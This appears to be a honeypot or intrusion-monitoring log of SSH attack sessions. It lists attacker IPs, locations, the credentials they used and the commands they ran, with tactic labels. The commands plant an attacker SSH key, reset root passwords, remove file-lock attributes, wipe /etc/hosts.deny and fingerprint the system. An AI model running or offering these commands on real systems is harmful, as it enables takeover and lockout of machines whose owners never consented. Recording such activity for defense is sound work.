$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 yankee_root_42 (43.135.165.118) β€” Santa Clara, United States Β· 1 session Β· 19 cmds
2026-05-18 10:39 EDT Β· as root/ch123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:khxo9zzCOfxh"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_82 (177.229.197.38) β€” Tapachula, Mexico Β· 2 sessions Β· 38 cmds
2026-05-18 09:57 EDT Β· as root/fred123, root/rjkj@efly
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:pIAnaLKiqWya"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:tp1YdptOiyJW"|chpasswd|bash
🎭 rogue_root_105 (150.109.15.37) β€” Singapore, Singapore Β· 3 sessions Β· 57 cmds
2026-05-18 09:59 EDT Β· as root/fred123, root/mark01, root/rjkj@efly
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:9RmydApGJ5Gs"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:TsLu6fOYx9NE"|chpasswd|bash
$ echo "root:Hyop7exErpHI"|chpasswd|bash
🎭 phantom_root_97 (190.223.60.209) β€” Tacna, Peru Β· 3 sessions Β· 57 cmds
2026-05-18 10:02 EDT Β· as root/fred123, root/kitty, root/rjkj@efly
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:HeW2nrj1kdnR"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:oFTIEQJtUimJ"|chpasswd|bash
$ echo "root:0TXK7dHakR2d"|chpasswd|bash
🎭 clog_root_2 (193.32.162.151) β€” Amsterdam, The Netherlands Β· 1 session Β· 1 cmd
2026-05-18 08:55 EDT Β· as hmsftp/hmsftp
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m // obfuscated system check
🎭 eagle_root_51 (138.197.200.106) β€” Santa Clara, United States Β· 1 session Β· 19 cmds
2026-05-18 08:33 EDT Β· as root/adonix
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:PUvK3jlhnDAZ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_91 (43.163.115.242) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-05-18 08:19 EDT Β· as root/adonix
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Jf1iZuHmxQOR"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_10 (43.163.84.53) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-05-18 06:27 EDT Β· as test/test2
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "test2\n2tP9YD06zXck\n2tP9YD06zXck"|passwd|bash
$ Enter new UNIX password:
$ echo "test2\n2tP9YD06zXck\n2tP9YD06zXck\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_98 (101.36.117.234) β€” Hong Kong, Hong Kong Β· 4 sessions Β· 76 cmds
2026-05-18 05:41 EDT Β· as root/123qweqwe, root/8ik,9ol.0p;/, root/hoang
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:Ny8L2bsgBIQh"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—4 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:DWH47Kex3rDs"|chpasswd|bash
$ echo "root:hZWhVd14t0UT"|chpasswd|bash
$ echo "root:rS8tpoNkkCyE"|chpasswd|bash
🎭 tiger_root_22 (103.211.218.124) β€” Mumbai, India Β· 4 sessions Β· 76 cmds
2026-05-18 05:42 EDT Β· as root/123qweqwe, root/8ik,9ol.0p;/, root/hoang
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:yUdcEQaWxH5M"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—4 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:QiYOiEyJoSca"|chpasswd|bash
$ echo "root:sPfHDIEzaNt8"|chpasswd|bash
$ echo "root:2FQPn7Vb6f94"|chpasswd|bash
🎭 liberty_root_40 (43.159.132.153) β€” Santa Clara, United States Β· 4 sessions Β· 76 cmds
2026-05-18 05:43 EDT Β· as root/123qweqwe, root/8ik,9ol.0p;/, root/hoang
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:KrBekNMPF3KT"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—4 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:0V2M9EPHj7L9"|chpasswd|bash
$ echo "root:LAi4D0GxArDa"|chpasswd|bash
$ echo "root:a5pRuwK5x40r"|chpasswd|bash
🎭 star_root_40 (43.153.31.146) β€” Santa Clara, United States Β· 2 sessions Β· 38 cmds
2026-05-18 05:23 EDT Β· as root/Asd@123321, root/felix
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:6j3bGPaNTJwy"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:MwKJYoNxqKZR"|chpasswd|bash
🎭 wraith_root_81 (103.176.20.115) β€” Quα»³nh LΓ΄i, Vietnam Β· 2 sessions Β· 38 cmds
2026-05-18 05:28 EDT Β· as root/Asd@123321, root/felix
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:cLPvq3cZgbbO"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:GE1oV43R7STM"|chpasswd|bash
🎭 phantom_root_99 (36.66.16.233) β€” South Tangerang, Indonesia Β· 2 sessions Β· 38 cmds
2026-05-18 05:24 EDT Β· as root/eric123, root/s123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:RN9XsQTLwVpG"|chpasswd|bash
